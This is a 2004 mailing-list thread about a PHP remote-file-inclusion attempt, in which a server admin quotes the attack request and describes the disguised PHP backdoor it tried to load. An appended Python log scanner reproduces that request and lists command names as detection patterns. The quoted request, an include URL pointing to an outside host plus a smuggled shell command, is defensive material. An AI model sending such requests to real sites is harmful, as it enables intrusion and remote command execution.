
| Subject: | Re: Data Cha0s PHP script attempt |
|---|---|
| Date: | Mon, 04 Oct 2004 15:33:28 +0000 |
I couldn't find much information about "lwp-trivial", but it seems to be not good for anything but badness. I guess I'll have to look into banning bots like this from our web server altogether.
Pall
Kirby Angell wrote:
Source IP: 200.203.109.237
Attack: PHP form variable include
Twice tonight our web server received URL requests like this:
GET /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w HTTP/1.0
Host: uptime.alertra.com
User-Agent: lwp-trivial/1.35
The attack attempts to trick the uptime.php form into loading the given URL through one of the form variables. Our forms are highly paranoid, so that didn't work. Of interest though, if you haven't seen it (and I hadn't) is the script they tried to download:
http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg
which isn't a JPG at all, but itself is a PHP page. I guess they thought that our "pin" variable was used in an "include" statement. The rogue PHP script does all sorts of interesting things such as running commands (as in the attack above), gathering intelligence, attempting exploits, and setting up back doors.
The script is apparently not too recent. It won't work on any default PHP install version 4.2 and above because it assumes the variables passed to it will be converted to global variables (see: http://www.php.net/manual/en/security.globals.php). Recent versions of PHP no longer do this.
The attacking IP seems to be a radio station in Brazil. I have sent an e-mail to them informing them that they are probably compromised.
I couldn't find much information about "lwp-trivial", but it seems to be not good for anything but badness. I guess I'll have to look into banning bots like this from our web server altogether.
--
Thank you,
Kirby Angell
Get notified anytime your website goes down! http://www.alertra.com
key: 9004F4C0 fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
--
_______________________________
Pall Thayer
artist/teacher
http://www.this.is/pallit
http://pallit.lhi.is/panse
_______________________________
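The request quoted in Kirby's report has two tells a web server log can be checked for: a form parameter whose value is a remote URL (the file-inclusion attempt against the "pin" variable) and a parameter carrying a shell command string (the "cmd" payload). The following script is an added example, not code from the thread or from Alertra; it applies both checks to constructed Apache combined-format log lines, the first of which reproduces the quoted request. The parameter allowlist `URL_PARAMS_ALLOWED`, the command-name list and the severity scheme are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format. The first line
# reproduces the request quoted in the report above; the other two are
# benign traffic invented for contrast (the third carries a URL in a
# parameter that is legitimately allowed to hold one).
SAMPLE_LOG = """\
200.203.109.237 - - [04/Oct/2004:03:12:41 +0000] "GET /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w HTTP/1.0" 200 512 "-" "lwp-trivial/1.35"
10.0.0.5 - - [04/Oct/2004:03:13:02 +0000] "GET /uptime.php?pin=1234 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.6 - - [04/Oct/2004:03:14:10 +0000] "GET /login.php?next=https%3A%2F%2Fexample.org%2Fhome HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rule 1: a parameter value that starts with a URL scheme asks the script to
# fetch something remote, which is what a file-inclusion attempt looks like.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Rule 2: a command name at the start of the value or right after a shell
# separator, as in the quoted "ls /;uname -a;w" payload.
COMMAND_RE = re.compile(r'(?:^|[;|&`])\s*(?:uname|id|ls|cat|wget|curl|w)\b')

# Constructed allowlist (an assumption about this site): parameter names
# that legitimately carry a URL, such as post-login redirect targets.
URL_PARAMS_ALLOWED = {"next", "return_to"}


def parse_query(target):
    """Return (path, [(name, value), ...]) with percent-decoding applied.

    The query is split on '&' only, so a ';' inside a value (as in the
    quoted attack) stays inside that value rather than starting a new
    parameter."""
    path, _, query = target.partition("?")
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return path, pairs


def scan_line(line):
    """Apply both rules to one log line and return a list of findings."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return []
    path, pairs = parse_query(m.group("target"))
    findings = []
    for name, value in pairs:
        if REMOTE_URL_RE.match(value) and name not in URL_PARAMS_ALLOWED:
            reason = "remote-url-in-parameter"
        elif COMMAND_RE.search(value):
            reason = "command-string-in-parameter"
        else:
            continue
        findings.append({"ip": m.group("ip"), "path": path, "param": name,
                         "value": value, "reason": reason, "ua": m.group("ua")})
    # Both rules firing on one request is much stronger evidence than either
    # alone; the user agent is recorded for context, not used as a rule.
    severity = "high" if len({f["reason"] for f in findings}) == 2 else "medium"
    for f in findings:
        f["severity"] = severity
    return findings


def scan_log(text):
    """Scan a whole access log (one request per line) and return all findings."""
    return [f for line in text.splitlines() for f in scan_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']} {f['path']} {f['param']}={f['value']!r} "
              f"[{f['reason']}] ua={f['ua']}")
```

Run against the sample, only the quoted request is reported (twice, once per parameter, at severity "high"); the login redirect on the third line is not, because "next" is on the allowlist. The user agent is deliberately left out of the rules: "lwp-trivial" is just a Perl HTTP client string and is trivially changed, so it is worth recording for context but is poor evidence on its own, which is the caveat behind the "banning bots" idea in the thread.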